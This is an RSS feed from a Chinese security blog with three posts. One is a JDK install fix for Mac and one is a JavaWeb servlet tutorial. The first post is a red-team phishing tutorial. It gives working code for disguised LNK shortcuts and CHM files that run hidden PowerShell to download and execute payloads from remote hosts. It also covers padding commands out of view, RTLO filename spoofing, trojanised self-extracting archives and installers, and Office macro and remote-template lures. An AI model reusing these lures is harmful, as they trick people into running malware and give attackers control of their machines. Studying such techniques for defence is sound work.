<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>syst1m &#8211; ChaBug安全</title>
	<atom:link href="/author/syst1m/feed" rel="self" type="application/rss+xml" />
	<link>/</link>
	<description>一个分享知识、结识伙伴、资源共享的博客</description>
	<lastBuildDate>Mon, 04 Jan 2021 11:28:18 +0000</lastBuildDate>
	<language>zh-CN</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=5.5.5</generator>
	<item>
		<title>邮件钓鱼学习</title>
		<link>/tools/2017.html</link>
		
		<dc:creator><![CDATA[syst1m]]></dc:creator>
		<pubDate>Mon, 04 Jan 2021 11:23:11 +0000</pubDate>
				<category><![CDATA[工具分享]]></category>
		<category><![CDATA[渗透测试]]></category>
		<guid isPermaLink="false">/?p=2017</guid>

					<description><![CDATA[前言 在常年攻防演练以及红蓝对抗中常被用于红方攻击的一种进行打点的方式，由于本人只是个安服仔，接触的比较少（但也不能不学），就有了这篇文章，参考各位大佬的姿势总结一下。 钓鱼手段 ...]]></description>
										<content:encoded><![CDATA[<ul>
<li>前言</li>
</ul>
<p><strong>在常年攻防演练以及红蓝对抗中常被用于红方攻击的一种进行打点的方式，由于本人只是个安服仔，接触的比较少（但也不能不学），就有了这篇文章，参考各位大佬的姿势总结一下。</strong></p>
<h2>钓鱼手段</h2>
<h3>Lnk（快捷方式）</h3>
<p>可以在“⽬标”栏写⼊⾃⼰的恶意命令，如powershell上线命令等，这里举例为CMD</p>
<p><img src="/wp-content/uploads/2021/01/20210103160612-1.png" alt="" /></p>
<p>当我点击谷歌浏览器时，弹出了CMD</p>
<p><img src="/wp-content/uploads/2021/01/20210103160947-1.png" alt="" /></p>
<p>可以进行更改图标</p>
<p><img src="/wp-content/uploads/2021/01/20210103161253-1.png" alt="" /></p>
<ul>
<li>快速生成lnk样本</li>
</ul>
<pre><code class="line-numbers">$WshShell = New-Object -comObject WScript.Shell  
$Shortcut = $WshShell.CreateShortcut("test.lnk")  
$Shortcut.TargetPath = "%SystemRoot%\system32\cmd.exe"  
$Shortcut.IconLocation = "%SystemRoot%\System32\Shell32.dll,21"  
$Shortcut.Arguments = "cmd /c powershell.exe -nop -w hidden -c IEX (new-object net.webclient).DownloadFile('http://192.168.1.7:8000/ascotbe.exe','.\\ascotbe.exe');&amp;cmd /c .\\ascotbe.exe"  
$Shortcut.Save()
</code></pre>
<p>运行</p>
<pre><code class="line-numbers">powershell -ExecutionPolicy RemoteSigned -file test.ps1
</code></pre>
<p><img src="/wp-content/uploads/2021/01/20210103163314-1.png" alt="" /></p>
<ul>
<li>Tips</li>
</ul>
<p><strong>目标文件位置所能显示最大字符串为260个，所有我们可以把执行的命令放在260个字符后面</strong></p>
<pre><code class="line-numbers">$file = Get-Content ".\test.txt"  
$WshShell = New-Object -comObject WScript.Shell  
$Shortcut = $WshShell.CreateShortcut("test.lnk")  
$Shortcut.TargetPath = "%SystemRoot%\system32\cmd.exe"  
$Shortcut.IconLocation = "%SystemRoot%\System32\Shell32.dll,21"  
$Shortcut.Arguments = '                                                                                                                                                                                                                                      '+ $file  
$Shortcut.Save()
</code></pre>
<h2>文件后缀RTLO</h2>
<p><strong>他会让字符串倒着编码</strong></p>
<p><img src="/wp-content/uploads/2021/01/20210103174703-1.png" alt="" /></p>
<ul>
<li>用Python一键生成用，把txt改为png后缀</li>
</ul>
<pre><code class="line-numbers">import os  
os.rename('test.txt', 'test-\u202egnp.txt')
</code></pre>
<pre><code class="line-numbers">import os
os.rename('cmd.exe', u'no\u202eFDP.exe')
</code></pre>
<h2>CHM文档</h2>
<p>创建一个文件夹（名字随意），在文件夹里面再创建两个文件夹（名字随意）和一个index.html文件，在两个文件夹内部创建各创建一个index.html文件。然后先将下列代码复制到根文件夹中的index.html中</p>
<p><img src="/wp-content/uploads/2021/01/20210103180223-1.png" alt="" /></p>
<ul>
<li>在index.html文件中编辑</li>
</ul>
<pre><code class="line-numbers">&lt;!DOCTYPE html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;Mousejack replay&lt;/title&gt;&lt;head&gt;&lt;/head&gt;&lt;body&gt;
command exec
&lt;OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1&gt;
&lt;PARAM name="Command" value="ShortCut"&gt;
 &lt;PARAM name="Button" value="Bitmap::shortcut"&gt;
 &lt;PARAM name="Item1" value=',calc.exe'&gt;
 &lt;PARAM name="Item2" value="273,1,1"&gt;
&lt;/OBJECT&gt;
&lt;SCRIPT&gt;
x.Click();
&lt;/SCRIPT&gt;
&lt;/body&gt;&lt;/html&gt;
</code></pre>
<ul>
<li>使用cs生成修改模版中的calc.exe</li>
</ul>
<pre><code class="line-numbers">&lt;!DOCTYPE html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;Mousejack replay&lt;/title&gt;&lt;head&gt;&lt;/head&gt;&lt;body&gt;
command exec
&lt;OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1&gt;
&lt;PARAM name="Command" value="ShortCut"&gt;
 &lt;PARAM name="Button" value="Bitmap::shortcut"&gt;
 &lt;PARAM name="Item1" value=",powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://192.168.1.100:81/a'))"&gt;
 &lt;PARAM name="Item2" value="273,1,1"&gt;
&lt;/OBJECT&gt;
&lt;SCRIPT&gt;
x.Click();
&lt;/SCRIPT&gt;
&lt;/body&gt;&lt;/html&gt;
</code></pre>
<ul>
<li>使用EasyCHM编译</li>
</ul>
<p><img src="/wp-content/uploads/2021/01/20210103181650-1.png" alt="" /></p>
<ul>
<li>原有模版CMD</li>
</ul>
<p><img src="/wp-content/uploads/2021/01/20210103181750-1.png" alt="" /></p>
<ul>
<li>ps上线</li>
</ul>
<p><img src="/wp-content/uploads/2021/01/20210103182926-1.png" alt="" /></p>
<h2>自解压</h2>
<ul>
<li>使用CS生成木马</li>
</ul>
<p><img src="/wp-content/uploads/2021/01/20210103183747-1.png" alt="" /></p>
<ul>
<li>创建自解压文件</li>
</ul>
<p><img src="/wp-content/uploads/2021/01/20210103184022-1.png" alt="" /></p>
<ul>
<li>高级自解压选项</li>
</ul>
<p><img src="/wp-content/uploads/2021/01/20210103184233-1.png" alt="" /></p>
<ul>
<li>解压路径-绝对路径</li>
</ul>
<p><img src="/wp-content/uploads/2021/01/20210103184310-1.png" alt="" /></p>
<ul>
<li>提取后运行</li>
</ul>
<p><img src="/wp-content/uploads/2021/01/20210103185602-1.png" alt="" /></p>
<ul>
<li>静默模式</li>
</ul>
<p><img src="/wp-content/uploads/2021/01/20210103184559-1.png" alt="" /></p>
<ul>
<li>更新模式</li>
</ul>
<p><img src="/wp-content/uploads/2021/01/20210103184719-1.png" alt="" /></p>
<ul>
<li>修改文件名</li>
</ul>
<p><img src="/wp-content/uploads/2021/01/20210103185941-1.png" alt="" /></p>
<h3>ResourceHacker</h3>
<p><img src="/wp-content/uploads/2021/01/20210103190216-1.png" alt="" /></p>
<ul>
<li>打开flash安装文件导出资源</li>
</ul>
<p><img src="/wp-content/uploads/2021/01/20210103190401-1.png" alt="" /></p>
<ul>
<li>替换资源文件</li>
</ul>
<p><img src="/wp-content/uploads/2021/01/20210103190557-1.png" alt="" /></p>
<p><img src="/wp-content/uploads/2021/01/20210103190647-1.png" alt="" /></p>
<ul>
<li>上线</li>
</ul>
<p><img src="/wp-content/uploads/2021/01/20210103190751-1.png" alt="" /></p>
<p><img src="/wp-content/uploads/2021/01/20210103190834-1.png" alt="" /></p>
<h2>office宏</h2>
<h3>本地加载</h3>
<ul>
<li>新建word，创建宏</li>
</ul>
<p><img src="/wp-content/uploads/2021/01/20210103191509-1.png" alt="" /></p>
<ul>
<li>cs生成宏粘贴</li>
</ul>
<p><img src="/wp-content/uploads/2021/01/20210103191615-1.png" alt="" /></p>
<p><img src="/wp-content/uploads/2021/01/20210103191756-1.png" alt="" /></p>
<ul>
<li>保存为启用宏的文档</li>
</ul>
<p><img src="/wp-content/uploads/2021/01/20210103191858-1.png" alt="" /></p>
<ul>
<li>打开文档上线</li>
</ul>
<p><img src="/wp-content/uploads/2021/01/20210103220610-1.png" alt="" /></p>
<h3>远程加载</h3>
<p>编写一个带有宏代码的DOTM文档，并启用一个http服务将DOTM放置于web下<br />
<img src="/wp-content/uploads/2021/01/20210104090953-1.png" alt="" /></p>
<p><img src="/wp-content/uploads/2021/01/20210104091023-1.png" alt="" /></p>
<p><img src="/wp-content/uploads/2021/01/20210104192755.png" alt="" /></p>
<ul>
<li>新建一个任意的模版的docx文档并且解压</li>
</ul>
<p><img src="/wp-content/uploads/2021/01/20210104091336-1.png" alt="" /></p>
<p><img src="/wp-content/uploads/2021/01/20210103222742-1.png" alt="" /></p>
<ul>
<li>编辑settings.xml.rels文件中的Target为我们第一个DOTM的http地址</li>
</ul>
<p><img src="/wp-content/uploads/2021/01/20210104092324-1.png" alt="" /></p>
<ul>
<li>重新压缩改后缀名为.docx</li>
</ul>
<p><img src="/wp-content/uploads/2021/01/20210104092252-1.png" alt="" /></p>
<ul>
<li>模拟点击上线</li>
</ul>
<p><img src="/wp-content/uploads/2021/01/20210104185613-1.png" alt="" /></p>
<h2>参考</h2>
<p>https://www.ascotbe.com/2020/07/26/office_0x01/#LNK%E9%92%93%E9%B1%BC</p>
<p>https://paper.seebug.org/1329/</p>
<p><a class="wp-editor-md-post-content-link" href="https://www.baikesec.com/webstudy/still/77.html">利用winrar自解压捆版payload制作免杀钓鱼木马</a></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Mac安装低版本Jdk解决方案</title>
		<link>/others/2003.html</link>
		
		<dc:creator><![CDATA[syst1m]]></dc:creator>
		<pubDate>Tue, 20 Oct 2020 08:01:48 +0000</pubDate>
				<category><![CDATA[其他杂乱]]></category>
		<category><![CDATA[教程分享]]></category>
		<category><![CDATA[编程学习]]></category>
		<guid isPermaLink="false">/?p=2003</guid>

					<description><![CDATA[前言 因为学习当中需要用到低版本的Jdk，我下载了一个jdk7u67版本，当我兴致勃勃的双击下去之后，却遭遇到这样的一个错误 解决方法 安装包pkg解压以后修改里面的判断版本的代码...]]></description>
										<content:encoded><![CDATA[<ul>
<li>前言</li>
</ul>
<p><strong>因为学习当中需要用到低版本的Jdk，我下载了一个jdk7u67版本，当我兴致勃勃的双击下去之后，却遭遇到这样的一个错误</strong></p>
<p><img src="/wp-content/uploads/2020/10/20201020154148.png" alt="" /></p>
<p><img src="/wp-content/uploads/2020/10/20201020154602.png" alt="" /></p>
<ul>
<li>解决方法</li>
</ul>
<p><strong>安装包pkg解压以后修改里面的判断版本的代码，然后在打包安装就可以了。</strong></p>
<h2>操作步骤</h2>
<ul>
<li>将安装包JDK 7 Update 67.pkg解压成unpkg包</li>
</ul>
<pre><code class="line-numbers">╰─➤  pkgutil --expand JDK 7 Update 67.pkg /tmp/jdk.unpkg
</code></pre>
<p><img src="/wp-content/uploads/2020/10/20201020154840.png" alt="" /></p>
<ul>
<li>进入jdk.unpkg，里面有个Distribution的文件，输入vim Distribution编辑此文件</li>
</ul>
<p><img src="/wp-content/uploads/2020/10/20201020155050.png" alt="" /></p>
<ul>
<li>编辑文件，修改验证逻辑</li>
</ul>
<p><img src="/wp-content/uploads/2020/10/20201020155303.png" alt="" /></p>
<pre><code class="line-numbers">function pm_install_check() {
  return true;
}
</code></pre>
<ul>
<li>修改完如图</li>
</ul>
<p><img src="/wp-content/uploads/2020/10/20201020155345.png" alt="" /></p>
<ul>
<li>再次打包成pkg</li>
</ul>
<pre><code class="line-numbers">pkgutil --flatten /tmp/jdk.unpkg /tmp/jdk.pkg
</code></pre>
<p><img src="/wp-content/uploads/2020/10/20201020155533.png" alt="" /></p>
<ul>
<li>安装低版本Jdk</li>
</ul>
<p><img src="/wp-content/uploads/2020/10/20201020155640.png" alt="" /></p>
<p><img src="/wp-content/uploads/2020/10/20201020155709.png" alt="" /></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Java学习入门之JavaWeb</title>
		<link>/code/1979.html</link>
		
		<dc:creator><![CDATA[syst1m]]></dc:creator>
		<pubDate>Sun, 11 Oct 2020 07:35:19 +0000</pubDate>
				<category><![CDATA[编程学习]]></category>
		<guid isPermaLink="false">/?p=1979</guid>

					<description><![CDATA[JavaWeb Servlet 实现了Servlet接口的java程序叫做Servlet 引入Servlet包 &#60;dependencies&#62; &#60;dependenc...]]></description>
										<content:encoded><![CDATA[<h1>JavaWeb</h1>
<h2>Servlet</h2>
<p><strong>实现了Servlet接口的java程序叫做Servlet</strong></p>
<ul>
<li>引入Servlet包</li>
</ul>
<pre><code class="language-java line-numbers">&lt;dependencies&gt;
        &lt;dependency&gt;
            &lt;groupId&gt;javax.servlet&lt;/groupId&gt;
            &lt;artifactId&gt;javax.servlet-api&lt;/artifactId&gt;
            &lt;version&gt;3.1.0&lt;/version&gt;
        &lt;/dependency&gt;

        &lt;dependency&gt;
            &lt;groupId&gt;javax.servlet.jsp&lt;/groupId&gt;
            &lt;artifactId&gt;jsp-api&lt;/artifactId&gt;
            &lt;version&gt;2.2&lt;/version&gt;
        &lt;/dependency&gt;
    &lt;/dependencies&gt;
</code></pre>
<p><img src="/wp-content/uploads/2020/10/20200929152216.png" alt="" /></p>
<ul>
<li>新建moudle修改web.xml头信息</li>
</ul>
<pre><code class="language-java line-numbers">&lt;?xml version="1.0" encoding="UTF-8"?&gt;
&lt;web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee
          http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"
         version="4.0"&gt;
&lt;/web-app&gt;
</code></pre>
<p><img src="/wp-content/uploads/2020/10/20200929160818.png" alt="" /></p>
<h3>helloServlet</h3>
<p><strong>编写代码</strong></p>
<pre><code class="language-java line-numbers">import javax.servlet.ServletException;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.IOException;
import java.io.PrintWriter;

public class helloservlet extends HttpServlet {

    @Override
    protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
        PrintWriter writer = resp.getWriter ();
        writer.print ("hello,y4er");

    }

    @Override
    protected void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
        doGet(req, resp);
    }


}
</code></pre>
<ul>
<li>编写Servlet映射（web.xml中）</li>
</ul>
<pre><code class="language-java line-numbers">  &lt;servlet&gt;
    &lt;servlet-name&gt;hello&lt;/servlet-name&gt;
    &lt;servlet-class&gt;helloservlet&lt;/servlet-class&gt;
  &lt;/servlet&gt;
  &lt;servlet-mapping&gt;
    &lt;servlet-name&gt;hello&lt;/servlet-name&gt;
    &lt;url-pattern&gt;/hello&lt;/url-pattern&gt;
  &lt;/servlet-mapping&gt;
</code></pre>
<ul>
<li>运行测试</li>
</ul>
<p><img src="/wp-content/uploads/2020/10/20200929162503.png" alt="" /></p>
<h3>ServletContext</h3>
<pre><code class="language-java line-numbers">this.getInitParameter() 初始化参数
this.getServletConfig() Servlet配置
this.getServletContext() Servlet上下文
</code></pre>
<h4>共享数据</h4>
<ul>
<li>helloservlet</li>
</ul>
<pre><code class="language-java line-numbers">import javax.servlet.ServletContext;
import javax.servlet.ServletException;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.IOException;
import java.io.PrintWriter;

public class helloservlet extends HttpServlet {

    @Override
    protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
        ServletContext servletContext = this.getServletContext ();

        String user = "syst1m";

        servletContext.setAttribute ("username",user);
    }

    @Override
    protected void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
        doGet(req, resp);
    }


}
</code></pre>
<ul>
<li>replyservlet</li>
</ul>
<pre><code class="language-java line-numbers">import javax.servlet.ServletContext;
import javax.servlet.ServletException;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.IOException;

public class replyservlet extends HttpServlet {

    @Override
    protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
        ServletContext servletContext = this.getServletContext ();
        String username = (String) servletContext.getAttribute ("username");

        resp.setContentType ("text/html");
        resp.setCharacterEncoding ("utf-8");
        resp.getWriter ().print ("名字为"+username);
    }

    @Override
    protected void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
        doGet (req, resp);
    }
}
</code></pre>
<ul>
<li>注册Servlet</li>
</ul>
<pre><code class="language-java line-numbers"> &lt;servlet&gt;
    &lt;servlet-name&gt;hello&lt;/servlet-name&gt;
    &lt;servlet-class&gt;helloservlet&lt;/servlet-class&gt;
  &lt;/servlet&gt;
  &lt;servlet-mapping&gt;
    &lt;servlet-name&gt;hello&lt;/servlet-name&gt;
    &lt;url-pattern&gt;/hello&lt;/url-pattern&gt;
  &lt;/servlet-mapping&gt;
  &lt;servlet&gt;
    &lt;servlet-name&gt;reply&lt;/servlet-name&gt;
    &lt;servlet-class&gt;replyservlet&lt;/servlet-class&gt;
  &lt;/servlet&gt;
  &lt;servlet-mapping&gt;
    &lt;servlet-name&gt;reply&lt;/servlet-name&gt;
    &lt;url-pattern&gt;/reply&lt;/url-pattern&gt;
  &lt;/servlet-mapping&gt;
</code></pre>
<ul>
<li>运行测试</li>
</ul>
<p><img src="/wp-content/uploads/2020/10/20200929171626.png" alt="" /></p>
<h4>获得初始化参数</h4>
<ul>
<li>注册Servlet</li>
</ul>
<pre><code class="language-java line-numbers">  &lt;context-param&gt;
    &lt;param-name&gt;jdbc&lt;/param-name&gt;
    &lt;param-value&gt;jdbc:mysql://localhost:3306/mybatis&lt;/param-value&gt;
  &lt;/context-param&gt;
</code></pre>
<pre><code class="language-java line-numbers"> &lt;servlet&gt;
    &lt;servlet-name&gt;jdbc&lt;/servlet-name&gt;
    &lt;servlet-class&gt;jdbcServlet&lt;/servlet-class&gt;
  &lt;/servlet&gt;
  &lt;servlet-mapping&gt;
    &lt;servlet-name&gt;jdbc&lt;/servlet-name&gt;
    &lt;url-pattern&gt;/jdbc&lt;/url-pattern&gt;
  &lt;/servlet-mapping&gt;
</code></pre>
<ul>
<li>代码</li>
</ul>
<pre><code class="language-java line-numbers">import javax.servlet.ServletContext;
import javax.servlet.ServletException;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.IOException;

public class jdbcServlet extends HttpServlet {

    @Override
    protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
        ServletContext servletContext = this.getServletContext ();
        String url = servletContext.getInitParameter ("jdbc");
        resp.getWriter ().print (url);
    }

    @Override
    protected void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
        super.doPost (req, resp);
    }
}
</code></pre>
<ul>
<li>运行测试</li>
</ul>
<p><img src="/wp-content/uploads/2020/10/20200929181012.png" alt="" /></p>
<h4>转发</h4>
<ul>
<li>code</li>
</ul>
<pre><code class="language-java line-numbers">public class forward extends HttpServlet {
    @Override
    protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
        ServletContext servletContext = this.getServletContext ();
        servletContext.getRequestDispatcher ("/jdbc").forward (req,resp);
    }

    @Override
    protected void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
        super.doPost (req, resp);
    }
}
</code></pre>
<h4>读取资源文件</h4>
<ul>
<li>db.properties</li>
</ul>
<pre><code class="language-java line-numbers">username=syst1m
password=123456
</code></pre>
<ul>
<li>code</li>
</ul>
<pre><code class="language-java line-numbers">import javax.servlet.ServletContext;
import javax.servlet.ServletException;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.IOException;
import java.io.InputStream;
import java.util.Properties;

public class jdbcServlet extends HttpServlet {

    @Override
    protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {

        InputStream is = this.getServletContext ().getResourceAsStream ("WEB-INF/classes/db.properties");

        Properties prop = new Properties ();
        prop.load (is);
        String username = prop.getProperty ("username");
        String password = prop.getProperty ("password");

        resp.getWriter ().print (username+password);

    }

    @Override
    protected void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
        super.doPost (req, resp);
    }
}
</code></pre>
<ul>
<li>运行测试</li>
</ul>
<p><img src="/wp-content/uploads/2020/10/20200929213530.png" alt="" /></p>
<h3>HttpServletResponse</h3>
<h4>Response下载文件</h4>
<ul>
<li>code</li>
</ul>
<pre><code class="language-java line-numbers">public class FileServlet extends HttpServlet {

    @Override
    protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
        //获取下载文件的路径
        String realPath = "/Users/syst1m/code/chabugservlet/com.web.servlet/src/main/resources/1.png";
        String FileName = realPath.substring (realPath.lastIndexOf ("\")+1);
        resp.setHeader ("Content-Disposition","attachment;filename="+ URLEncoder.encode (FileName,"UTF-8"));
        FileInputStream in = new FileInputStream (realPath);
        int len = 0;
        byte[] buffer = new byte[1024];
        ServletOutputStream out = resp.getOutputStream ();
        while((len=in.read(buffer))&gt;0){
            out.write (buffer,0,len);
        }

        in.close();
        out.close ();
    }

    @Override
    protected void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
        doGet(req, resp);
    }
}
</code></pre>
<ul>
<li>注册Servlet</li>
</ul>
<pre><code class="language-java line-numbers">&lt;/servlet-mapping&gt;
  &lt;servlet&gt;
    &lt;servlet-name&gt;down&lt;/servlet-name&gt;
    &lt;servlet-class&gt;FileServlet&lt;/servlet-class&gt;
  &lt;/servlet&gt;
  &lt;servlet-mapping&gt;
    &lt;servlet-name&gt;down&lt;/servlet-name&gt;
    &lt;url-pattern&gt;/down&lt;/url-pattern&gt;
  &lt;/servlet-mapping&gt;
</code></pre>
<ul>
<li>运行测试</li>
</ul>
<p><img src="/wp-content/uploads/2020/10/20200930105034.png" alt="" /></p>
<h4>Response实现验证码</h4>
<ul>
<li>code</li>
</ul>
<pre><code class="language-java line-numbers">public class captchaServlet extends HttpServlet {

    @Override
    protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {

        //浏览器每三秒刷新一次
        resp.setHeader ("refresh","3");
        //内存中创建一张图片
        BufferedImage image = new BufferedImage (80,20,BufferedImage.TYPE_3BYTE_BGR);
        //得到图片
        Graphics2D g = (Graphics2D)image.getGraphics ();
        //设置图片背景色
        g.setColor (Color.white);
        g.fillRect (0,0,80,80);
        //给图片写数据
        g.setColor (Color.blue);
        g.setFont (new Font (null,Font.BOLD,20));
        g.drawString (makenum(),1,20);
        //浏览器：以图片类型打开
        resp.setContentType ("image/jpeg");
        //清除缓存，不让浏览器缓存
        resp.setDateHeader ("expires",-1);
        resp.setHeader ("Cache-Control","no-cache");
        resp.setHeader ("Pragme","no-cache");
        // 把图片写给浏览器
        ImageIO.write (image,"jpg",resp.getOutputStream ());

    }

    @Override
    protected void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
        doGet(req, resp);
    }
    //生成随机数

    private String makenum(){
        Random random = new Random ();
        String num = random.nextInt (9999)+"";
        StringBuffer sb = new StringBuffer ();

        for (int i = 0; i &lt; 7-num.length (); i++) {
            sb.append ("0");
        }
        num = sb.toString ()+num;
        return num;
    }
}
</code></pre>
<ul>
<li>注册Servlet</li>
</ul>
<pre><code class="language-java line-numbers">&lt;servlet&gt;
    &lt;servlet-name&gt;img&lt;/servlet-name&gt;
    &lt;servlet-class&gt;captchaServlet&lt;/servlet-class&gt;
  &lt;/servlet&gt;
  &lt;servlet-mapping&gt;
    &lt;servlet-name&gt;img&lt;/servlet-name&gt;
    &lt;url-pattern&gt;/img&lt;/url-pattern&gt;
  &lt;/servlet-mapping&gt;
</code></pre>
<ul>
<li>运行测试</li>
</ul>
<p><img src="/wp-content/uploads/2020/10/20200930141558.png" alt="" /></p>
<h4>Response实现重定向</h4>
<pre><code class="line-numbers">resp.sendRedirect
</code></pre>
<h3>HttpServletRequest</h3>
<ul>
<li>注册Servlet</li>
</ul>
<pre><code class="language-java line-numbers"> &lt;servlet&gt;
    &lt;servlet-name&gt;LoginServlet&lt;/servlet-name&gt;
    &lt;servlet-class&gt;LoginServlet&lt;/servlet-class&gt;
  &lt;/servlet&gt;
  &lt;servlet-mapping&gt;
    &lt;servlet-name&gt;LoginServlet&lt;/servlet-name&gt;
    &lt;url-pattern&gt;/login&lt;/url-pattern&gt;
  &lt;/servlet-mapping&gt;
</code></pre>
<ul>
<li>index.jsp</li>
</ul>
<pre><code class="language-java line-numbers">&lt;%@ page contentType="text/html;charset=UTF-8" language="java" %&gt;
&lt;html&gt;
&lt;head&gt;
    &lt;title&gt;登陆&lt;/title&gt;
&lt;/head&gt;
&lt;body&gt;
&lt;h1&gt;登陆&lt;/h1&gt;
    &lt;div&gt;
        &lt;form action="${pageContext.request.contextPath}/login" method="post"&gt;

            用户名：&lt;input type="text" name="username"&gt;&lt;br&gt;
            密码：&lt;input type="password" name="password"&gt;&lt;br&gt;
            爱好：
            &lt;input type="checkbox" name="hobbys" value="女孩"&gt;女孩
            &lt;input type="checkbox" name="hobbys" value="代码"&gt;代码
            &lt;input type="checkbox" name="hobbys" value="chabug"&gt;chabug
            &lt;input type="checkbox" name="hobbys" value="渗透测试"&gt;渗透测试

            &lt;br&gt;
            &lt;button type="submit"&gt;submit&lt;/button&gt;
        &lt;/form&gt;
    &lt;/div&gt;
&lt;/body&gt;
&lt;/html&gt;  
</code></pre>
<ul>
<li>success.jsp</li>
</ul>
<pre><code class="language-java line-numbers">&lt;%@ page contentType="text/html;charset=UTF-8" language="java" %&gt;
&lt;html&gt;
&lt;head&gt;
    &lt;title&gt;登陆成功&lt;/title&gt;
&lt;/head&gt;
&lt;body&gt;
&lt;h1&gt;登陆成功&lt;/h1&gt;
&lt;/body&gt;
&lt;/html&gt;
</code></pre>
<ul>
<li>LoginServlet</li>
</ul>
<pre><code class="language-java line-numbers">public class LoginServlet extends HttpServlet {

    @Override
    protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
       req.setCharacterEncoding ("UTF-8");
       resp.setCharacterEncoding ("UTF-8");
       String username = req.getParameter ("username");
       String password = req.getParameter ("password");
       String[] hobbys = req.getParameterValues ("hobbys");

       System.out.println (username);
       System.out.println (password);
       System.out.println (Arrays.toString (hobbys));
       req.getRequestDispatcher ("/success.jsp").forward (req,resp);


    }

    @Override
    protected void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
        doGet(req, resp);
    }
}
</code></pre>
<ul>
<li>运行测试</li>
</ul>
<p><img src="/wp-content/uploads/2020/10/20200930215258.png" alt="" /></p>
<p><img src="/wp-content/uploads/2020/10/20200930220719.png" alt="" /></p>
<p><img src="/wp-content/uploads/2020/10/20200930220653.png" alt="" /></p>
<h3>Cookie</h3>
<ul>
<li>注册Servlet</li>
</ul>
<pre><code class="language-java line-numbers">  &lt;servlet&gt;
    &lt;servlet-name&gt;cookie&lt;/servlet-name&gt;
    &lt;servlet-class&gt;CookieServlet&lt;/servlet-class&gt;
  &lt;/servlet&gt;
  &lt;servlet-mapping&gt;
    &lt;servlet-name&gt;cookie&lt;/servlet-name&gt;
    &lt;url-pattern&gt;/cookie&lt;/url-pattern&gt;
  &lt;/servlet-mapping&gt;
&lt;/web-app&gt;
</code></pre>
<ul>
<li>code</li>
</ul>
<pre><code class="language-java line-numbers">public class CookieServlet extends HttpServlet {

    @Override
    protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {

        //解决乱码

        req.setCharacterEncoding ("UTF-8");
        resp.setCharacterEncoding ("UTF-8");
        PrintWriter out = resp.getWriter ();
        Cookie[] cookies = req.getCookies ();

        if(cookies!=null){
            out.write ("你上一次的时间是");
            for (int i = 0; i &lt; cookies.length; i++) {
                Cookie cookie = cookies[i];
                if(cookie.getName ().equals ("lastlogintime")){
                    long logintime = Long.parseLong (cookie.getValue ());
                    Date date = new Date (logintime);
                    out.write (date.toLocaleString ());
                }
            }
        }else {
            out.write ("这是你第一次访问本站点");
        }
        Cookie cookie = new Cookie ("lastlogintime",System.currentTimeMillis ()+"");
        cookie.setMaxAge (***);
        resp.addCookie (cookie);
    }

    @Override
    protected void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
        doGet(req, resp);
    }
}
</code></pre>
<ul>
<li>运行测试</li>
</ul>
<p><img src="/wp-content/uploads/2020/10/20201001155826.png" alt="" /></p>
<h3>Session</h3>
<ul>
<li>设置，读取，删除</li>
</ul>
<pre><code class="language-java line-numbers">protected void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
        //获取Sesseion对象
        HttpSession session=request.getSession();
        session.setAttribute("username", "zhangsan");//存储数据
        session.getAttribute("username");//获取数据
        session.removeAttribute("username");//删除数据
    }
</code></pre>
<ul>
<li>Session的销毁</li>
</ul>
<pre><code class="line-numbers">session.invalidate()
</code></pre>
<h2>JSP</h2>
<ul>
<li>jsp原理</li>
